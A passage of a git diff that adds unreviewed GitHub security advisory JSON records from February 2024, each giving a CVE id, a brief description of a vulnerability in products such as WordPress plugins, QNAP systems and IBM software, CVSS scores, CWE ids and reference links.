+ "published": "2024-02-02T12:30:30Z", + "aliases": [ + "CVE-2024-0963" + ], + "details": "The Calculated Fields Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's CP_CALCULATED_FIELDS shortcode in all versions up to, and including, 1.2.52 due to insufficient input sanitization and output escaping on user supplied 'location' attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0963" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3029782/calculated-fields-form/trunk/inc/cpcff_main.inc.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3029782%40calculated-fields-form&new=3029782%40calculated-fields-form&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d870ff8d-ea4b-4777-9892-0d9982182b9f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T12:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-phfj-2mq7-qmg7/GHSA-phfj-2mq7-qmg7.json b/advisories/unreviewed/2024/02/GHSA-phfj-2mq7-qmg7/GHSA-phfj-2mq7-qmg7.json new file mode 100644 index 0000000000000..57d764c468aca --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-phfj-2mq7-qmg7/GHSA-phfj-2mq7-qmg7.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-phfj-2mq7-qmg7", + "modified": "2024-02-02T18:30:32Z", + "published": "2024-02-02T18:30:32Z", + "aliases": [ + "CVE-2023-47568" + ], + "details": "A SQL injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated users to inject malicious code via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.5.2645 build 20240116 and later\nQTS 4.5.4.2627 build 20231225 and later\nQuTS hero h5.1.5.2647 build 20240118 and later\nQuTS hero h4.5.4.2626 build 20231225 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47568" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-24-05" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-phfq-h2c2-v87m/GHSA-phfq-h2c2-v87m.json b/advisories/unreviewed/2024/02/GHSA-phfq-h2c2-v87m/GHSA-phfq-h2c2-v87m.json new file mode 100644 index 0000000000000..8138b9911c0ae --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-phfq-h2c2-v87m/GHSA-phfq-h2c2-v87m.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-phfq-h2c2-v87m", + "modified": "2024-02-08T06:30:24Z", + "published": "2024-02-08T06:30:24Z", + "aliases": [ + "CVE-2024-0511" + ], + "details": "The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the wpr_update_form_action_meta function. This makes it possible for unauthenticated attackers to post metadata via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0511" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/dc8bef03-51e0-4448-bddd-85300104e875?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T06:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-phfx-2gmw-mfx5/GHSA-phfx-2gmw-mfx5.json b/advisories/unreviewed/2024/02/GHSA-phfx-2gmw-mfx5/GHSA-phfx-2gmw-mfx5.json new file mode 100644 index 0000000000000..69e1589cc07aa --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-phfx-2gmw-mfx5/GHSA-phfx-2gmw-mfx5.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-phfx-2gmw-mfx5", + "modified": "2024-02-07T12:30:26Z", + "published": "2024-02-07T12:30:26Z", + "aliases": [ + "CVE-2024-1118" + ], + "details": "The Podlove Subscribe button plugin for WordPress is vulnerable to UNION-based SQL Injection via the 'button' attribute of the podlove-subscribe-button shortcode in all versions up to, and including, 1.3.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1118" + }, + { + "type": "WEB", + "url": "https://github.com/podlove/podlove-subscribe-button-wp-plugin/commit/b16b7a2e98db4c642ca671b0aede4dbfce4578b3" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032152%40podlove-subscribe-button&new=3032152%40podlove-subscribe-button&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f234f05f-e377-4e89-81e1-f47ff44eebc5?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T11:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pj36-rhxp-gj4x/GHSA-pj36-rhxp-gj4x.json b/advisories/unreviewed/2024/02/GHSA-pj36-rhxp-gj4x/GHSA-pj36-rhxp-gj4x.json new file mode 100644 index 0000000000000..d95452441e54b --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pj36-rhxp-gj4x/GHSA-pj36-rhxp-gj4x.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pj36-rhxp-gj4x", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-20811" + ], + "details": "Improper caller verification in GameOptimizer prior to SMR Feb-2024 Release 1 allows local attackers to configure GameOptimizer.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20811" + }, + { + "type": "WEB", + "url": "https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T03:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pjx4-f26p-jc98/GHSA-pjx4-f26p-jc98.json b/advisories/unreviewed/2024/02/GHSA-pjx4-f26p-jc98/GHSA-pjx4-f26p-jc98.json new file mode 100644 index 0000000000000..a4352249129ba --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pjx4-f26p-jc98/GHSA-pjx4-f26p-jc98.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pjx4-f26p-jc98", + "modified": "2024-02-03T00:31:34Z", + "published": "2024-02-03T00:31:34Z", + "aliases": [ + "CVE-2024-1195" + ], + "details": "A vulnerability classified as critical was found in iTop VPN up to 4.0.0.1. Affected by this vulnerability is an unknown functionality in the library ITopVpnCallbackProcess.sys of the component IOCTL Handler. The manipulation leads to denial of service. The attack needs to be approached locally. The identifier VDB-252685 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1195" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252685" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252685" + }, + { + "type": "WEB", + "url": "https://www.youtube.com/watch?v=JdQMINPVJd8" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T22:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pmqc-v2g6-qw5w/GHSA-pmqc-v2g6-qw5w.json b/advisories/unreviewed/2024/02/GHSA-pmqc-v2g6-qw5w/GHSA-pmqc-v2g6-qw5w.json new file mode 100644 index 0000000000000..40a7bed2a3f34 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pmqc-v2g6-qw5w/GHSA-pmqc-v2g6-qw5w.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pmqc-v2g6-qw5w", + "modified": "2024-02-08T15:30:26Z", + "published": "2024-02-08T12:30:48Z", + "aliases": [ + "CVE-2023-6515" + ], + "details": "Authorization Bypass Through User-Controlled Key vulnerability in Mia Technology Inc. MİA-MED allows Authentication Abuse.This issue affects MİA-MED: before 1.0.7.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6515" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-24-0087" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T10:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pmvf-52m5-fj89/GHSA-pmvf-52m5-fj89.json b/advisories/unreviewed/2024/02/GHSA-pmvf-52m5-fj89/GHSA-pmvf-52m5-fj89.json new file mode 100644 index 0000000000000..eba9968ff4152 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pmvf-52m5-fj89/GHSA-pmvf-52m5-fj89.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pmvf-52m5-fj89", + "modified": "2024-02-06T12:30:31Z", + "published": "2024-02-06T12:30:31Z", + "aliases": [ + "CVE-2024-24941" + ], + "details": "In JetBrains IntelliJ IDEA before 2023.3.3 a plugin for JetBrains Space was able to send an authentication token to an inappropriate URL", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24941" + }, + { + "type": "WEB", + "url": "https://www.jetbrains.com/privacy-security/issues-fixed/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T10:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pp44-pghv-3r5p/GHSA-pp44-pghv-3r5p.json b/advisories/unreviewed/2024/02/GHSA-pp44-pghv-3r5p/GHSA-pp44-pghv-3r5p.json new file mode 100644 index 0000000000000..0bffce42034dd --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pp44-pghv-3r5p/GHSA-pp44-pghv-3r5p.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pp44-pghv-3r5p", + "modified": "2024-02-06T06:30:32Z", + "published": "2024-02-06T06:30:32Z", + "aliases": [ + "CVE-2023-43518" + ], + "details": "Memory corruption in video while parsing invalid mp2 clip.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43518" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-ppj5-c4cc-c277/GHSA-ppj5-c4cc-c277.json b/advisories/unreviewed/2024/02/GHSA-ppj5-c4cc-c277/GHSA-ppj5-c4cc-c277.json new file mode 100644 index 0000000000000..7a6a1692fb790 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-ppj5-c4cc-c277/GHSA-ppj5-c4cc-c277.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ppj5-c4cc-c277", + "modified": "2024-02-06T15:32:06Z", + "published": "2024-02-06T15:32:06Z", + "aliases": [ + "CVE-2024-0911" + ], + "details": "A flaw was found in Indent. This issue may allow a local user to use a specially-crafted file to trigger a heap-based buffer overflow, which can lead to an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0911" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2024-0911" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2260399" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T15:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pqjc-g576-r2pc/GHSA-pqjc-g576-r2pc.json b/advisories/unreviewed/2024/02/GHSA-pqjc-g576-r2pc/GHSA-pqjc-g576-r2pc.json new file mode 100644 index 0000000000000..d842580e50452 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pqjc-g576-r2pc/GHSA-pqjc-g576-r2pc.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pqjc-g576-r2pc", + "modified": "2024-02-08T03:32:45Z", + "published": "2024-02-08T03:32:45Z", + "aliases": [ + "CVE-2024-24025" + ], + "details": "An arbitrary File upload vulnerability exists in Novel-Plus v4.3.0-RC1 and prior at com.java2nb.common.controller.FileController: upload(). An attacker can pass in specially crafted filename parameter to perform arbitrary File download.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24025" + }, + { + "type": "WEB", + "url": "https://github.com/201206030/novel-plus" + }, + { + "type": "WEB", + "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24025.txt" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T01:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pv6w-6xw6-fcqg/GHSA-pv6w-6xw6-fcqg.json b/advisories/unreviewed/2024/02/GHSA-pv6w-6xw6-fcqg/GHSA-pv6w-6xw6-fcqg.json new file mode 100644 index 0000000000000..c067fa04afe30 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pv6w-6xw6-fcqg/GHSA-pv6w-6xw6-fcqg.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pv6w-6xw6-fcqg", + "modified": "2024-02-05T09:30:28Z", + "published": "2024-02-05T09:30:28Z", + "aliases": [ + "CVE-2024-24865" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Noah Kagan Scroll Triggered Box allows Stored XSS.This issue affects Scroll Triggered Box: from n/a through 2.3.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24865" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/dreamgrow-scroll-triggered-box/wordpress-scroll-triggered-box-plugin-2-3-cross-site-scripting-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T07:15:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pvg3-4m54-rhwj/GHSA-pvg3-4m54-rhwj.json b/advisories/unreviewed/2024/02/GHSA-pvg3-4m54-rhwj/GHSA-pvg3-4m54-rhwj.json new file mode 100644 index 0000000000000..049d85d4f1d5e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pvg3-4m54-rhwj/GHSA-pvg3-4m54-rhwj.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pvg3-4m54-rhwj", + "modified": "2024-02-08T21:30:33Z", + "published": "2024-02-01T09:30:18Z", + "aliases": [ + "CVE-2023-51939" + ], + "details": "An issue in the cp_bbs_sig function in relic/src/cp/relic_cp_bbs.c of Relic relic-toolkit 0.6.0 allows a remote attacker to obtain sensitive information and escalate privileges via the cp_bbs_sig function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51939" + }, + { + "type": "WEB", + "url": "https://github.com/relic-toolkit/relic/issues/284" + }, + { + "type": "WEB", + "url": "https://gist.github.com/liang-junkai/1b59487c0f7002fa5da98035b53e409f" + }, + { + "type": "WEB", + "url": "https://github.com/liang-junkai/Relic-bbs-fault-injection" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T07:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pvj2-qwhc-2m88/GHSA-pvj2-qwhc-2m88.json b/advisories/unreviewed/2024/02/GHSA-pvj2-qwhc-2m88/GHSA-pvj2-qwhc-2m88.json new file mode 100644 index 0000000000000..9ad50c73d84ba --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pvj2-qwhc-2m88/GHSA-pvj2-qwhc-2m88.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pvj2-qwhc-2m88", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-02T00:31:28Z", + "aliases": [ + "CVE-2024-21869" + ], + "details": "In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, the affected product stores plaintext credentials in various places. This may allow an attacker with local access to see them.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21869" + }, + { + "type": "WEB", + "url": "https://rapidscada.org/contact/" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-256", + "CWE-522" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T00:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pvv5-7gwv-cvmf/GHSA-pvv5-7gwv-cvmf.json b/advisories/unreviewed/2024/02/GHSA-pvv5-7gwv-cvmf/GHSA-pvv5-7gwv-cvmf.json new file mode 100644 index 0000000000000..869d473ffcf70 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pvv5-7gwv-cvmf/GHSA-pvv5-7gwv-cvmf.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pvv5-7gwv-cvmf", + "modified": "2024-02-03T03:30:28Z", + "published": "2024-02-03T03:30:28Z", + "aliases": [ + "CVE-2023-43016" + ], + "details": "IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a remote user to log into the server due to a user account with an empty password. IBM X-Force ID: 266154.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43016" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/266154" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7106586" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-258", + "CWE-521" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T01:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-px37-v4hm-7f6q/GHSA-px37-v4hm-7f6q.json b/advisories/unreviewed/2024/02/GHSA-px37-v4hm-7f6q/GHSA-px37-v4hm-7f6q.json new file mode 100644 index 0000000000000..e5b00f4fa082e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-px37-v4hm-7f6q/GHSA-px37-v4hm-7f6q.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-px37-v4hm-7f6q", + "modified": "2024-02-02T03:30:32Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2023-50328" + ], + "details": "IBM PowerSC 1.3, 2.0, and 2.1 may allow a remote attacker to view session identifiers passed via URL query strings. IBM X-Force ID: 275110.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50328" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/275110" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7113759" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-598", + "CWE-668" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T02:15:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-px9w-2f28-5wvj/GHSA-px9w-2f28-5wvj.json b/advisories/unreviewed/2024/02/GHSA-px9w-2f28-5wvj/GHSA-px9w-2f28-5wvj.json new file mode 100644 index 0000000000000..0249dbadb17cf --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-px9w-2f28-5wvj/GHSA-px9w-2f28-5wvj.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-px9w-2f28-5wvj", + "modified": "2024-02-05T06:30:31Z", + "published": "2024-02-05T06:30:31Z", + "aliases": [ + "CVE-2024-20004" + ], + "details": "In Modem NL1, there is a possible system crash due to an improper input validation. This could lead to remote denial of service, if NW sent invalid NR RRC Connection Setup message, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01191612; Issue ID: MOLY01195812 (MSV-985).", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20004" + }, + { + "type": "WEB", + "url": "https://corp.mediatek.com/product-security-bulletin/February-2024" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T06:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pxh3-hmj4-xhjv/GHSA-pxh3-hmj4-xhjv.json b/advisories/unreviewed/2024/02/GHSA-pxh3-hmj4-xhjv/GHSA-pxh3-hmj4-xhjv.json new file mode 100644 index 0000000000000..7c0b6c218afd7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pxh3-hmj4-xhjv/GHSA-pxh3-hmj4-xhjv.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pxh3-hmj4-xhjv", + "modified": "2024-02-07T00:30:25Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2024-24255" + ], + "details": "A Race Condition discovered in geofence.cpp and mission_feasibility_checker.cpp in PX4 Autopilot 1.14 and earlier allows attackers to send drones on unintended missions.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24255" + }, + { + "type": "WEB", + "url": "https://github.com/Drone-Lab/PX4-Autopilot/blob/report-the-faliure-of-precheck/report-the-faliure-of-precheck.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T23:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pxh8-3c47-gmr6/GHSA-pxh8-3c47-gmr6.json b/advisories/unreviewed/2024/02/GHSA-pxh8-3c47-gmr6/GHSA-pxh8-3c47-gmr6.json new file mode 100644 index 0000000000000..e66739e59d921 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pxh8-3c47-gmr6/GHSA-pxh8-3c47-gmr6.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pxh8-3c47-gmr6", + "modified": "2024-02-07T00:30:25Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2023-45222" + ], + "details": "\n\n\nAn attacker with access to the web application that has the vulnerable software could introduce arbitrary JavaScript by injecting a cross-site scripting payload into the \"autorefresh\" parameter.\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45222" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-023-04" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T22:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-q37v-9p49-p44f/GHSA-q37v-9p49-p44f.json b/advisories/unreviewed/2024/02/GHSA-q37v-9p49-p44f/GHSA-q37v-9p49-p44f.json new file mode 100644 index 0000000000000..b0d82a8fbd65e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-q37v-9p49-p44f/GHSA-q37v-9p49-p44f.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q37v-9p49-p44f", + "modified": "2024-02-03T03:30:27Z", + "published": "2024-02-03T03:30:27Z", + "aliases": [ + "CVE-2023-31006" + ], + "details": "IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) is vulnerable to a denial of service attacks on the DSC server. IBM X-Force ID: 254776.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31006" + }, 